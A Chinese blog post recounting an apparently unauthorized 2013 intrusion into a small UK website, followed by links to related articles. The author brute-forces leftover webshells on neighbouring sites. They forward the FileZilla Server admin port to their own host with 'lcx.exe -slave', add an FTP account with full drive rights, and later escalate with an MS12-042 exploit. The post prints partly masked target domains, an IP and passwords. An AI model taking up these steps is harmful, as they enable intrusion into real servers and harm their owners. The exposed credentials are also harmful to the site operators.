记一次后门爆破到提权实战案例

简介: 记一次后门爆破到提权实战案例

0x01 前言

Date/time:2013年,这次的目标是一个英国小网站,目的是拿下这个站点指定文件的修改权限。习惯性的在渗透某个目标之前先对目标进行基本的信息搜集,这样在后面的渗透过程中可以省下不少时间,此次的渗透可以说80%的运气,20%的经验才顺利拿到目标权限。


基本信息探测:

  • 目标站点:http://www.wem****.co.uk
  • 服务器IP:9*.1*9.1*4.*2(英国)
  • 环境平台:ASP.NET
  • 服务器系统:Microsoft-IIS/7.5
PORT         STATE          SERVICE         VERSION
21/tcp       open           ftp             FileZilla ftpd 0.9.41 beta
80/tcp       open           http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)


0x02 Getshell过程

这里就简化写了,先在主站仔细找找上传、注入、Fckeditor和敏感文件、目录,结果都没找到,主站基本没戏了,接着拿御剑对目标站的旁站进行扫描,后来去忙其他事了,放着在扫,事情忙完后还看了部电影,准备关电脑睡觉的时候才发现御剑还在扫着的呢,都快给忘了。


打开御剑把扫描到的链接导出来,用了半小时检测,虽然发现了一些上传、注入,Fckeditor啥的,但感觉这些漏洞好像都被别人修复过了,接着往下看,找到了几个敏感文件名,打开看既然是一个大马和一句话木马,通过弱口令和爆破方式成功得到密码。

    弱口令测试:
    http://www.berkshire-*****-workshops.co.uk/test.aspx    Pass:admin
    一句话爆破:
    http://www.sonnergy*shade.co.uk/css.asp                 Pass:110


    爆破字典:https://github.com/3had0w/Fuzzing-Dicts


    注:成功拿到这个目标网站的Webshell权限可以说运气成份很大,但也需要一定的细心、耐心和经验,这几点在做渗透测试时也是非常重要的。


    0x03 实战提权过程

    由于这次目的是拿下这个目标站点指定文件的修改权限,所以我们得先去看看能不能直接跨到目标站点路径,如果不能直接跨过去或者是没有修改权限时再去想其它办法进行提权。

    1. 经过测试发现可直接跨到目标站,并且具备上传、新建和删除文件权限,但就是没有修改权限;
    2. 2008的提权EXP不多,尝试了各种已知提权EXP均以失败告终,可以再去试一下MSF的提权模块;
    3. 找第三方软件提权,前期的信息探测中已知系统运行着FileZilla ftpd 0.9.41 beta软件,找找看有没有安装的有FileZilla Server服务端;


    注:可以用netstat -ano、tasklist命令来查看目标机器中是否安装的有可用于提权的第三方软件,如:Radmin、Gene6FTP、FileZilla Server等。


    Filezilla Serve这个软件在国外服务器用的还是挺多的,21端口是客户端连接时需要的,14147端口则是服务端运行时需要的。我们的提权方法就是利用端口转发方式直接登录到目标机器的Filezilla Server服务端,然后创建一个拥有全盘目录权限的FTP账户。


    (1) 使用netstat -ano、tasklist命令确认目标服务器是否运行了Filezilla Server软件,是不是用默认的14147端口,或者是修改为其它端口了,如下图。

    (2) Filezilla Server服务端一般都会默认安装在C、D盘下的\Program Files\文件夹中,这里我已经提前找到了,安装目录下有2个重要的XML配置文件。

      用来保存管理员用户信息:
      C:\Program Files\FileZilla Server\FileZillaServer Interface.xml
      用来保存普通FTP用户信息:
      C:\Program Files\FileZilla Server\FileZilla Server.xml


      (3) 本地执行:lcx.exe -listen 51 14147首先本机监听51端口,连接用14147端口。

      (4) Webshell上执行:lcx.exe -slave 外网IP 51 127.0.0.1 14147

      (5) 本地运行打包下来的Filezilla Server,打开后会自动读取配置文件里的账户密码进行连接。

      注:如果出现连接不上的情况,这可能是因为我们本地的Filezilla Server与目标的Filezilla Server版本不一致,为了避免这个问题,可以直接将服务器上的Filezilla Server整个文件夹打包下来运行。


      (6) Filezilla Server上创建一个拥有C、D盘权限账户,将读取/写入/创建/删除权限都给勾选上。

      (7) 这里给的D盘权限是因为目标网站都放在D盘,只要达到能修改指定文件目的就行,大家在实际测试过程中可以选择添加C盘权限,然后再进行下一步的提权操作,《FileZilla Server提权与常见问题》。

      这里目的已经达到,指定文件已经有了修改权限,所以就暂时没再继续提服务器了,FTP权限已经足够用了!隔了几天后用MS12-042提权EXP成功拿到服务器权限,帐号:luoye,密码:456$love。


      0x04 思考总结

      (1) 服务器外网,配置文件有修改权限,直接修改FileZilla Server.xml配置文件,这种情况应该比较少见,就不再详细写了。

      (2) 服务器外网,配置文件只读权限,通过端口转发工具将端口转发出来,如果服务器不在内网,随便一款端口转发都可以。

      (3) 服务器内网,配置文件只读权限,利用lcx.exe将内网端口转发出来,与2的方法是一样的,只不过一个内网,一个外网。

      • 外网服务器:用端口转发功能突破配置文件只读限制;
      • 内网服务器:用端口转发功能突破内网连接及配置文件只读限制;


      相关文章
      |
      7月前
      |
      网络协议 安全 网络安全
      Sophos Firewall (SFOS) v21.5 GA - 下一代防火墙
      Sophos Firewall (SFOS) v21.5 GA - 下一代防火墙
      262 1
      |
      10月前
      |
      移动开发 前端开发 PHP
      thinkphp框架开发的码支付mpay源码
      码支付[mpay]是一款便捷收款工具,专注于个人免签收款,通过普通收款码即可实现收款通知自动回调,支持绝大多数商城系统
      379 14
      thinkphp框架开发的码支付mpay源码
      |
      12月前
      |
      SQL 安全 关系型数据库
      MySQL UDF提权
      通过这些内容的详细介绍和实际案例分析,希望能帮助您深入理解MySQL UDF提权的机制、实现步骤及防范措施,提高系统的安全性和防护能力。
      741 11
      Vue3对话框(Dialog)
      该 Vue2 对话框组件提供丰富的可定制属性,如标题、内容、宽度、高度等,并支持自定义按钮文本和样式。其预览效果展示了多种使用场景,包括全屏切换、加载状态及自定义样式等。该组件适用于各种需要弹窗功能的应用场景。[在线预览](https://themusecatcher.github.io/vue-amazing-ui/guide/components/dialog.html)提供了更多实例。此文章详情见原文链接,若涉及版权问题,请告知以便删除。
      467 1
      Vue3对话框(Dialog)
      |
      JavaScript 前端开发 Java
      2024 年顶级自动化测试工具
      2024 年顶级自动化测试工具
      569 0
      |
      前端开发 小程序 PHP
      分享81个PHP源码,总有一款适合您
      分享81个PHP源码,总有一款适合您
      385 1
      |
      Kubernetes 关系型数据库 网络架构
      ray集群部署vllm的折磨
      概括如下: 在构建一个兼容多种LLM推理框架的平台时,开发者选择了Ray分布式框架,以解决资源管理和适配问题。然而,在尝试集成vllm时遇到挑战,因为vllm内部自管理Ray集群,与原有设计冲突。经过一系列尝试,包括调整资源分配、修改vllm源码和利用Ray部署的`placement_group_bundles`特性,最终实现了兼容,但依赖于非官方支持的解决方案。在面对vllm新版本和Ray部署的`reconfigure`方法问题时,又需权衡和调整实现方式。尽管面临困难,开发者认为使用Ray作为统一底层仍具有潜力。
      |
      IDE Java 编译器
      Java 错误: 无效的目标发行版 5 Java: 错误: 无效的目标发行版8 Java: 错误: 不支持发行版本17Java:无效的目标发行版17
      Java 错误: 无效的目标发行版 5 Java: 错误: 无效的目标发行版8 Java: 错误: 不支持发行版本17Java:无效的目标发行版17
      |
      SQL 安全
      一键启动+AWVS+Sqlmap+BurpSutie+Xray多级代理联合测试
      一键启动+AWVS+Sqlmap+BurpSutie+Xray多级代理联合测试
      990 20
      |
      监控 安全 测试技术
      ms17-010(永恒之蓝)漏洞复现
      ms17-010(永恒之蓝)利用的端口是445端口。 本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。第一部分“了解渗透测试流程”可以略过,可以直接从第二部分“使用nmap工具对win7进行扫描”开始看起。
      3053 5
      ms17-010(永恒之蓝)漏洞复现